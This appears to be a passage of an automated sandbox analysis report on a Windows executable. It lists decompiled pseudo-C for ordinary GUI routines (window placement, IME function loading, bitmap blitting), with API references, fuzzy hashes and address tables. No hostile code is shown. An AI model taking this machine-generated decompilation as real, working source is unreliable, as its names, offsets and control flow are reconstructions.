                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$Placement$Iconic
                                                                                • String ID: ,
                                                                                • API String ID: 568898626-3772416878
                                                                                • Opcode ID: 2d2fe602c13c17a3eaef5902701b5c7d8957c30b490faa51bd2125ed603c3441
                                                                                • Instruction ID: f697fd54e0fb4167afa721afb97f5442208712750027ed9413839f016224fae9
                                                                                • Opcode Fuzzy Hash: 2d2fe602c13c17a3eaef5902701b5c7d8957c30b490faa51bd2125ed603c3441
                                                                                • Instruction Fuzzy Hash: 51210375A00204ABCF54EE6DC8C1ADA77A8EF4C354F04546AFE14EF346D779E9048BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00454F94, Relevance: 7.6, APIs: 5, Instructions: 59nativewindowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E00454F94(void* __eax) {
				int _t21;
				struct HWND__* _t36;
				void* _t40;

				_t40 = __eax;
				_t1 = _t40 + 0x30; // 0x0
				_t21 = IsIconic( *_t1);
				if(_t21 == 0) {
					E004546A8();
					_t2 = _t40 + 0x30; // 0x0
					SetActiveWindow( *_t2);
					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E0043BD14( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
						_t15 = _t40 + 0x30; // 0x0
						_t21 = E0045403C( *_t15, 6, __eflags);
					} else {
						_t43 =  *((intOrPtr*)(_t40 + 0x44));
						_t36 = E0043BD14( *((intOrPtr*)(_t40 + 0x44)));
						_t13 = _t40 + 0x30; // 0x0
						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
						_push(0);
						_push(0xf020);
						_push(0x112);
						_t14 = _t40 + 0x30; // 0x0
						_t21 =  *_t14;
						_push(_t21);
						L00406CF8();
					}
					if( *((short*)(_t40 + 0x102)) != 0) {
						return  *((intOrPtr*)(_t40 + 0x100))();
					}
				}
				return _t21;
			}






                                                                                0x00454f96
                                                                                0x00454f98
                                                                                0x00454f9c
                                                                                0x00454fa3
                                                                                0x00454fab
                                                                                0x00454fb0
                                                                                0x00454fb4
                                                                                0x00454fbd
                                                                                0x00455021
                                                                                0x00455024
                                                                                0x00454fe0
                                                                                0x00454fe4
                                                                                0x00454ff6
                                                                                0x00454ffc
                                                                                0x00455000
                                                                                0x00455005
                                                                                0x00455007
                                                                                0x0045500c
                                                                                0x00455011
                                                                                0x00455011
                                                                                0x00455014
                                                                                0x00455015
                                                                                0x00455015
                                                                                0x00455031
                                                                                0x00000000
                                                                                0x0045503b
                                                                                0x00455031
                                                                                0x00455043

                                                                                APIs
                                                                                • IsIconic.USER32 ref: 00454F9C
                                                                                • SetActiveWindow.USER32(00000000,00000000,?,?,0045562C), ref: 00454FB4
                                                                                • IsWindowEnabled.USER32(00000000), ref: 00454FD7
                                                                                • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0045562C), ref: 00455000
                                                                                • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 00455015
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$ActiveEnabledIconicNtdllProc_
                                                                                • String ID:
                                                                                • API String ID: 1720852555-0
                                                                                • Opcode ID: d66857b54b9d65b31de6600cf4d57014042e8adefd9dc7c0df7d020a167db46a
                                                                                • Instruction ID: bc32191d19c11dd8aa89d07b34db473d5acae12cf2d68384427f1f3fe8b85b2d
                                                                                • Opcode Fuzzy Hash: d66857b54b9d65b31de6600cf4d57014042e8adefd9dc7c0df7d020a167db46a
                                                                                • Instruction Fuzzy Hash: AC113D716006009BDB50EE69C9C6B6A37ACAF08709F08106ABE00DF2C7D67DEC848768
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00426384, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E00426384(void* __edi, struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t19;
				intOrPtr _t21;
				struct HWND__* _t23;

				_t19 = _a8;
				_t23 = _a4;
				if( *0x487abd != 0) {
					if((_t19 & 0x00000003) == 0) {
						if(IsIconic(_t23) == 0) {
							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
						} else {
							GetWindowPlacement(_t23,  &_v48);
						}
						return E004262F4( &(_v48.rcNormalPosition), _t19);
					}
					return 0x12340042;
				}
				_t21 =  *0x487a98; // 0x426384
				 *0x487a98 = E00426184(1, _t19, _t21, __edi, _t23);
				return  *0x487a98(_t23, _t19);
			}










                                                                                0x0042638c
                                                                                0x0042638f
                                                                                0x00426399
                                                                                0x004263c3
                                                                                0x004263d4
                                                                                0x004263e7
                                                                                0x004263d6
                                                                                0x004263db
                                                                                0x004263db
                                                                                0x00000000
                                                                                0x004263f1
                                                                                0x00000000
                                                                                0x004263c5
                                                                                0x004263a0
                                                                                0x004263ad
                                                                                0x00000000

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: MonitorFromWindow
                                                                                • API String ID: 190572456-2842599566
                                                                                • Opcode ID: 41ae98723c44f648c6272eaf8641f930f77534da594e4d0ca101c735a2abc96e
                                                                                • Instruction ID: 567358acfe5b995f89d1c8aef49e0bb1b6a21afc04d96dbc621d34004d80f09b
                                                                                • Opcode Fuzzy Hash: 41ae98723c44f648c6272eaf8641f930f77534da594e4d0ca101c735a2abc96e
                                                                                • Instruction Fuzzy Hash: 6B018F71604129AACB01EB94AC81AAF735CEB01318B95042BFC2593242DB3DDA1187BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00430110, Relevance: 6.0, APIs: 4, Instructions: 46sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E00430110(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				CHAR* _t20;
				long _t25;
				intOrPtr _t30;
				void* _t34;
				intOrPtr _t37;

				_push(0);
				_t34 = __eax;
				_push(_t37);
				_push(0x43018d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E0042FB5C(__eax);
				_t25 = GetTickCount();
				do {
					Sleep(0);
				} while (GetTickCount() - _t25 <= 0x3e8);
				E0042F7B4(_t34, _t25,  &_v8, 0, __edi, _t34);
				if(_v8 != 0) {
					_t20 = E004047D0(_v8);
					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
				}
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(0x430194);
				return E00404320( &_v8);
			}









                                                                                0x00430113
                                                                                0x00430117
                                                                                0x0043011b
                                                                                0x0043011c
                                                                                0x00430121
                                                                                0x00430124
                                                                                0x00430129
                                                                                0x00430133
                                                                                0x00430135
                                                                                0x00430137
                                                                                0x00430143
                                                                                0x00430151
                                                                                0x0043015a
                                                                                0x00430163
                                                                                0x00430172
                                                                                0x00430172
                                                                                0x00430179
                                                                                0x0043017c
                                                                                0x0043017f
                                                                                0x0043018c

                                                                                APIs
                                                                                  • Part of subcall function 0042FB5C: WinHelpA.USER32 ref: 0042FB6B
                                                                                • GetTickCount.KERNEL32 ref: 0043012E
                                                                                • Sleep.KERNEL32(00000000,00000000,0043018D,?,?,00000000,00000000,?,00430103), ref: 00430137
                                                                                • GetTickCount.KERNEL32 ref: 0043013C
                                                                                • WinHelpA.USER32 ref: 00430172
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CountHelpTick$Sleep
                                                                                • String ID:
                                                                                • API String ID: 2438605093-0
                                                                                • Opcode ID: 215cb68ffd52fe6f5e1b5f238888ac6efa749f36870d96729315158fb80a6ae0
                                                                                • Instruction ID: 893ac3cba8f77228d60b9289927b75d4118f1bf31978c33a349a08650ecbfcdb
                                                                                • Opcode Fuzzy Hash: 215cb68ffd52fe6f5e1b5f238888ac6efa749f36870d96729315158fb80a6ae0
                                                                                • Instruction Fuzzy Hash: DF01F270700204AFE711EB76CC52B1EB3A8DB48B04FA1417BF500E3AC1CA3C6E049559
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004397C4, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 91%
                                                                                			E004397C4(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				intOrPtr* _t65;
				intOrPtr* _t67;
				void* _t68;

				_t67 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t68 = _t17 - 0x84;
				if(_t68 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E00435E04(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						return E00436914(_t50, _t67);
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E00439730(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E0043C018(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t67 + 8)));
						_push( *((intOrPtr*)(_t67 + 4)));
						_push( *_t67);
						_t32 = E0043BD14(_t50);
						_push(_t32);
						L00406CF8();
						return _t32;
					}
					goto L27;
				}
				if(_t68 == 0) {
					_t21 = E00436914(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E0040725C( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E004351E4(_t50,  &_v28,  &_v20);
					_t21 = E0043969C(_t50, 0,  &_v28, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t67 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t65 = E0044CA54(__eax);
					if(_t65 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t65 + 0xe4))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E0043BD14(__eax);
						if(_t45 == GetCapture() &&  *0x46b990 != 0) {
							_t47 =  *0x46b990; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x46b990; // 0x0
								E00436848(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}


















                                                                                0x004397ca
                                                                                0x004397cc
                                                                                0x004397ce
                                                                                0x004397d0
                                                                                0x004397d5
                                                                                0x004397f4
                                                                                0x004397f7
                                                                                0x004398d4
                                                                                0x004398db
                                                                                0x00439926
                                                                                0x00439926
                                                                                0x00439926
                                                                                0x00439917
                                                                                0x00000000
                                                                                0x0043991b
                                                                                0x00439805
                                                                                0x0043989e
                                                                                0x004398a5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004398ab
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004398af
                                                                                0x004398b6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004398bb
                                                                                0x004398bf
                                                                                0x004398c2
                                                                                0x004398c5
                                                                                0x004398ca
                                                                                0x004398cb
                                                                                0x00000000
                                                                                0x004398cb
                                                                                0x00000000
                                                                                0x0043980b
                                                                                0x004397d7
                                                                                0x0043984d
                                                                                0x00439856
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00439865
                                                                                0x00439874
                                                                                0x00439881
                                                                                0x00439888
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0043988e
                                                                                0x00000000
                                                                                0x0043988e
                                                                                0x004397d9
                                                                                0x004397dc
                                                                                0x00439817
                                                                                0x0043981b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00439827
                                                                                0x0043982f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00439835
                                                                                0x004397de
                                                                                0x004397df
                                                                                0x0043983e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004397e1
                                                                                0x004397e4
                                                                                0x004398e1
                                                                                0x004398ef
                                                                                0x004398fa
                                                                                0x00439902
                                                                                0x0043990d
                                                                                0x00439912
                                                                                0x00439912
                                                                                0x00439902
                                                                                0x004398ef
                                                                                0x004397e4

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Capture
                                                                                • String ID:
                                                                                • API String ID: 1145282425-3916222277
                                                                                • Opcode ID: 1e86b3af473012e45797b6946e2ec80d15827e37d479ea7193c588e5337ef3a1
                                                                                • Instruction ID: 43cdc9794d8c31f967ccfb3724705cbd40727e764bae9717ab87b78639a13af6
                                                                                • Opcode Fuzzy Hash: 1e86b3af473012e45797b6946e2ec80d15827e37d479ea7193c588e5337ef3a1
                                                                                • Instruction Fuzzy Hash: 523190B130020586CB24AA2D8C8575A6395AF8D318F15B53FB4A6C7792DABCCD05C759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004405C4, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 83%
                                                                                			E004405C4() {
				int _v8;
				intOrPtr _t4;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t29;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t44;

				_t42 = _t44;
				_t4 =  *0x486dd0; // 0x4877f0
				if( *((char*)(_t4 + 0xc)) == 0) {
					return _t4;
				} else {
					_v8 = SetErrorMode(0x8000);
					_push(_t42);
					_push(0x44072a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					if( *0x487bb8 == 0) {
						 *0x487bb8 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
					}
					if( *0x46b9fc == 0) {
						 *0x46b9fc = LoadLibraryA("IMM32.DLL");
						if( *0x46b9fc != 0) {
							_t11 =  *0x46b9fc; // 0x0
							 *0x487bbc = GetProcAddress(_t11, "ImmGetContext");
							_t13 =  *0x46b9fc; // 0x0
							 *0x487bc0 = GetProcAddress(_t13, "ImmReleaseContext");
							_t15 =  *0x46b9fc; // 0x0
							 *0x487bc4 = GetProcAddress(_t15, "ImmGetConversionStatus");
							_t17 =  *0x46b9fc; // 0x0
							 *0x487bc8 = GetProcAddress(_t17, "ImmSetConversionStatus");
							_t19 =  *0x46b9fc; // 0x0
							 *0x487bcc = GetProcAddress(_t19, "ImmSetOpenStatus");
							_t21 =  *0x46b9fc; // 0x0
							 *0x487bd0 = GetProcAddress(_t21, "ImmSetCompositionWindow");
							_t23 =  *0x46b9fc; // 0x0
							 *0x487bd4 = GetProcAddress(_t23, "ImmSetCompositionFontA");
							_t25 =  *0x46b9fc; // 0x0
							 *0x487bd8 = GetProcAddress(_t25, "ImmGetCompositionStringA");
							_t27 =  *0x46b9fc; // 0x0
							 *0x487bdc = GetProcAddress(_t27, "ImmIsIME");
							_t29 =  *0x46b9fc; // 0x0
							 *0x487be0 = GetProcAddress(_t29, "ImmNotifyIME");
						}
					}
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(0x440731);
					return SetErrorMode(_v8);
				}
			}


















                                                                                0x004405c5
                                                                                0x004405c9
                                                                                0x004405d2
                                                                                0x00440734
                                                                                0x004405d8
                                                                                0x004405e2
                                                                                0x004405e7
                                                                                0x004405e8
                                                                                0x004405ed
                                                                                0x004405f0
                                                                                0x004405fa
                                                                                0x00440613
                                                                                0x00440613
                                                                                0x0044061f
                                                                                0x0044062f
                                                                                0x0044063b
                                                                                0x00440646
                                                                                0x00440651
                                                                                0x0044065b
                                                                                0x00440666
                                                                                0x00440670
                                                                                0x0044067b
                                                                                0x00440685
                                                                                0x00440690
                                                                                0x0044069a
                                                                                0x004406a5
                                                                                0x004406af
                                                                                0x004406ba
                                                                                0x004406c4
                                                                                0x004406cf
                                                                                0x004406d9
                                                                                0x004406e4
                                                                                0x004406ee
                                                                                0x004406f9
                                                                                0x00440703
                                                                                0x0044070e
                                                                                0x0044070e
                                                                                0x0044063b
                                                                                0x00440715
                                                                                0x00440718
                                                                                0x0044071b
                                                                                0x00440729
                                                                                0x00440729

                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00008000), ref: 004405DD
                                                                                • GetModuleHandleA.KERNEL32(USER32,00000000,0044072A,?,00008000), ref: 00440601
                                                                                • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 0044060E
                                                                                • LoadLibraryA.KERNEL32(IMM32.DLL,00000000,0044072A,?,00008000), ref: 0044062A
                                                                                • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 0044064C
                                                                                • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00440661
                                                                                • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00440676
                                                                                • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 0044068B
                                                                                • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004406A0
                                                                                • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004406B5
                                                                                • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004406CA
                                                                                • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004406DF
                                                                                • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 004406F4
                                                                                • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00440709
                                                                                • SetErrorMode.KERNEL32(?,00440731,00008000), ref: 00440724
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                                                                • String ID: IMM32.DLL$ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME
                                                                                • API String ID: 3397921170-3271328588
                                                                                • Opcode ID: a215f9482aca3cc701cffad9bd2f85d0981100ccb56e893b3e39329e0a459fdd
                                                                                • Instruction ID: 0cf64c75a47a1564bac7c0c751d74d83d05284642008fa8f65c16265756f8fe4
                                                                                • Opcode Fuzzy Hash: a215f9482aca3cc701cffad9bd2f85d0981100ccb56e893b3e39329e0a459fdd
                                                                                • Instruction Fuzzy Hash: A83125F1E453406EE700EB66EC56A1A37A8E704714B21C83FF601D7292D7BCA8649F9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00420360, Relevance: 37.7, APIs: 25, Instructions: 248windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 77%
                                                                                			E00420360(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				struct HPALETTE__* _v40;
				intOrPtr* _t78;
				struct HPALETTE__* _t89;
				struct HPALETTE__* _t95;
				int _t171;
				intOrPtr _t178;
				intOrPtr _t180;
				struct HDC__* _t182;
				int _t184;
				void* _t186;
				void* _t187;
				intOrPtr _t188;

				_t186 = _t187;
				_t188 = _t187 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t182 = __eax;
				_t184 = _a16;
				_t171 = _a20;
				_v13 = 1;
				_t78 =  *0x486dc8; // 0x46b0ac
				if( *_t78 != 2 || _t171 != _a40 || _t184 != _a36) {
					_v40 = 0;
					_v20 = E004201BC(CreateCompatibleDC(0));
					_push(_t186);
					_push(0x4205e0);
					_push( *[fs:eax]);
					 *[fs:eax] = _t188;
					_v24 = E004201BC(CreateCompatibleBitmap(_a32, _t171, _t184));
					_v28 = SelectObject(_v20, _v24);
					_t89 =  *0x487a28; // 0xf50806b6
					_v40 = SelectPalette(_a32, _t89, 0);
					SelectPalette(_a32, _v40, 0);
					if(_v40 == 0) {
						_t95 =  *0x487a28; // 0xf50806b6
						_v40 = SelectPalette(_v20, _t95, 0xffffffff);
					} else {
						_v40 = SelectPalette(_v20, _v40, 0xffffffff);
					}
					RealizePalette(_v20);
					StretchBlt(_v20, 0, 0, _t171, _t184, _a12, _a8, _a4, _t171, _t184, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t171, _t184, _a32, _a28, _a24, _t171, _t184, 0x440328);
					_v32 = SetTextColor(_t182, 0);
					_v36 = SetBkColor(_t182, 0xffffff);
					StretchBlt(_t182, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t171, _t184, 0x8800c6);
					StretchBlt(_t182, _v8, _v12, _a40, _a36, _v20, 0, 0, _t171, _t184, 0x660046);
					SetTextColor(_t182, _v32);
					SetBkColor(_t182, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t178);
					 *[fs:eax] = _t178;
					_push(E004205E7);
					if(_v40 != 0) {
						SelectPalette(_v20, _v40, 0);
					}
					return DeleteDC(_v20);
				} else {
					_v24 = E004201BC(CreateCompatibleBitmap(_a32, 1, 1));
					_v24 = SelectObject(_a12, _v24);
					_push(_t186);
					_push(0x420433);
					_push( *[fs:eax]);
					 *[fs:eax] = _t188;
					MaskBlt(_t182, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407250(0xaa0029, 0xcc0020));
					_pop(_t180);
					 *[fs:eax] = _t180;
					_push(E004205E7);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}























                                                                                0x00420361
                                                                                0x00420363
                                                                                0x00420369
                                                                                0x0042036c
                                                                                0x0042036f
                                                                                0x00420371
                                                                                0x00420374
                                                                                0x00420377
                                                                                0x0042037b
                                                                                0x00420383
                                                                                0x0042043c
                                                                                0x0042044b
                                                                                0x00420450
                                                                                0x00420451
                                                                                0x00420456
                                                                                0x00420459
                                                                                0x0042046c
                                                                                0x0042047c
                                                                                0x00420481
                                                                                0x00420490
                                                                                0x0042049d
                                                                                0x004204a6
                                                                                0x004204be
                                                                                0x004204cd
                                                                                0x004204a8
                                                                                0x004204b7
                                                                                0x004204b7
                                                                                0x004204d4
                                                                                0x004204f6
                                                                                0x00420518
                                                                                0x00420525
                                                                                0x00420533
                                                                                0x0042055a
                                                                                0x0042057f
                                                                                0x00420589
                                                                                0x00420593
                                                                                0x0042059c
                                                                                0x004205a6
                                                                                0x004205a6
                                                                                0x004205af
                                                                                0x004205b6
                                                                                0x004205b9
                                                                                0x004205bc
                                                                                0x004205c5
                                                                                0x004205d1
                                                                                0x004205d1
                                                                                0x004205df
                                                                                0x0042039b
                                                                                0x004203ad
                                                                                0x004203bd
                                                                                0x004203c2
                                                                                0x004203c3
                                                                                0x004203c8
                                                                                0x004203cb
                                                                                0x00420407
                                                                                0x0042040e
                                                                                0x00420411
                                                                                0x00420414
                                                                                0x00420426
                                                                                0x00420432
                                                                                0x00420432

                                                                                APIs
                                                                                • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 004203A3
                                                                                • SelectObject.GDI32(?,?), ref: 004203B8
                                                                                • MaskBlt.GDI32(?,?,?,?,?,?,00000000,0041F807,?,?,?,00000000,00000000,00420433,?,?), ref: 00420407
                                                                                • SelectObject.GDI32(?,?), ref: 00420421
                                                                                • DeleteObject.GDI32(?), ref: 0042042D
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00420441
                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00420462
                                                                                • SelectObject.GDI32(?,?), ref: 00420477
                                                                                • SelectPalette.GDI32(?,F50806B6,00000000), ref: 0042048B
                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 0042049D
                                                                                • SelectPalette.GDI32(?,00000000,000000FF), ref: 004204B2
                                                                                • SelectPalette.GDI32(?,F50806B6,000000FF), ref: 004204C8
                                                                                • RealizePalette.GDI32(?), ref: 004204D4
                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004204F6
                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,0041F807,?,?,00440328), ref: 00420518
                                                                                • SetTextColor.GDI32(?,00000000), ref: 00420520
                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 0042052E
